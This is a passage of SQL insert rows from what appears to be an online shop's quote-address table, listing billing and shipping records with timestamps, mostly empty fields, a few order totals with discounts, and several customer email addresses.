(701, 533, '2026-01-29 09:41:08', '2026-01-29 09:41:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(702, 534, '2026-02-02 11:23:26', '2026-02-02 11:23:26', 123, 0, NULL, 'billing', 'ca.b.u.d.a.fa.d.u.m5.9.9@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(703, 534, '2026-02-02 11:23:26', '2026-02-02 11:23:26', 123, 0, NULL, 'shipping', 'ca.b.u.d.a.fa.d.u.m5.9.9@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(704, 535, '2026-02-05 04:32:27', '2026-02-05 04:32:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(705, 535, '2026-02-05 04:32:27', '2026-02-05 04:32:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(706, 536, '2026-02-05 07:34:36', '2026-02-05 07:34:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(707, 536, '2026-02-05 07:34:36', '2026-02-05 07:34:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(708, 537, '2026-02-05 08:15:52', '2026-02-05 08:15:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(709, 537, '2026-02-05 08:15:52', '2026-02-05 08:15:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(710, 538, '2026-02-05 11:11:13', '2026-02-05 11:11:13', 124, 0, NULL, 'billing', 'i.dib.uq.uf.i.y.i.27.2@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(711, 538, '2026-02-05 11:11:13', '2026-02-05 11:11:13', 124, 0, NULL, 'shipping', 'i.dib.uq.uf.i.y.i.27.2@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(712, 539, '2026-02-09 19:56:01', '2026-02-09 19:56:01', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(713, 539, '2026-02-09 19:56:01', '2026-02-09 19:56:01', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(714, 540, '2026-02-09 19:56:20', '2026-02-09 19:56:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(715, 540, '2026-02-09 19:56:20', '2026-02-09 19:56:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(716, 541, '2026-02-09 23:08:33', '2026-02-09 23:08:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(717, 541, '2026-02-09 23:08:33', '2026-02-09 23:08:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(718, 542, '2026-02-12 08:51:13', '2026-02-12 08:51:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(719, 542, '2026-02-12 08:51:13', '2026-02-12 08:51:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(720, 543, '2026-02-12 09:04:18', '2026-02-12 09:04:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(721, 543, '2026-02-12 09:04:18', '2026-02-12 09:04:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(722, 544, '2026-02-14 16:18:41', '2026-02-14 16:18:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(723, 544, '2026-02-14 16:18:41', '2026-02-14 16:18:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(724, 545, '2026-02-14 16:22:33', '2026-02-14 16:22:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(725, 545, '2026-02-14 16:22:33', '2026-02-14 16:22:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(726, 546, '2026-02-14 16:27:00', '2026-02-14 16:27:00', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(727, 546, '2026-02-14 16:27:00', '2026-02-14 16:27:00', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(728, 547, '2026-02-14 16:31:07', '2026-02-14 16:31:07', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(729, 547, '2026-02-14 16:31:07', '2026-02-14 16:31:07', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(730, 548, '2026-02-18 06:14:42', '2026-02-18 06:14:42', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(731, 548, '2026-02-18 06:14:42', '2026-02-18 06:14:42', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(732, 549, '2026-02-19 05:37:38', '2026-02-19 05:37:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(733, 549, '2026-02-19 05:37:38', '2026-02-19 05:37:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 4.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(734, 550, '2026-02-19 17:02:15', '2026-02-19 17:02:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(735, 550, '2026-02-19 17:02:15', '2026-02-19 17:02:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(736, 551, '2026-02-19 17:06:59', '2026-02-19 17:06:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(737, 551, '2026-02-19 17:06:59', '2026-02-19 17:06:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(738, 552, '2026-02-22 14:24:12', '2026-02-22 14:24:12', 125, 0, NULL, 'billing', 'pum.eba.h.ezi.z.i0.8@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(739, 552, '2026-02-22 14:24:12', '2026-02-22 14:24:12', 125, 0, NULL, 'shipping', 'pum.eba.h.ezi.z.i0.8@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(740, 553, '2026-02-26 03:16:55', '2026-02-26 03:16:55', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(741, 553, '2026-02-26 03:16:55', '2026-02-26 03:16:55', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 118.0000, 4998.0000, 4998.0000, 3998.4000, 3998.4000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -999.6000, -999.6000, 3998.4000, 3998.4000, NULL, '[]', NULL, 0.0000, 0.0000, 4998.0000, 4998.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(742, 554, '2026-02-27 06:07:55', '2026-02-27 06:07:55', 126, 0, NULL, 'billing', 'j.id.a.xukas.as.1.15@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(743, 554, '2026-02-27 06:07:55', '2026-02-27 06:07:55', 126, 0, NULL, 'shipping', 'j.id.a.xukas.as.1.15@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(744, 555, '2026-03-02 01:55:47', '2026-03-02 01:55:47', 127, 0, NULL, 'billing', 'se.y.oj.ere.6.87@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(745, 555, '2026-03-02 01:55:47', '2026-03-02 01:55:47', 127, 0, NULL, 'shipping', 'se.y.oj.ere.6.87@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(746, 556, '2026-03-03 06:33:29', '2026-03-03 06:33:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
